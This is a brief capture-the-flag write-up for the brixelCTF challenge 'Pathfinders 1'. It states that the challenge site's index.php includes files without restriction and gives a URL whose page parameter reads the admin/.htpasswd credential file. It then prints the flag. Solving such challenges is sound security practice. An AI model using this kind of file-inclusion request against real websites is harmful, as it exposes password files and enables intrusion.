The index.php is used to load files without any limit, so only access:
http://timesink.be/pathfinder/index.php?page=admin/.htpasswd

`brixelCTF{unsafe_include}`

Original writeup (https://md.darknebu.la/4cDzvoArTDCD-hpjSmVTwQ?both#Pathfinders-1).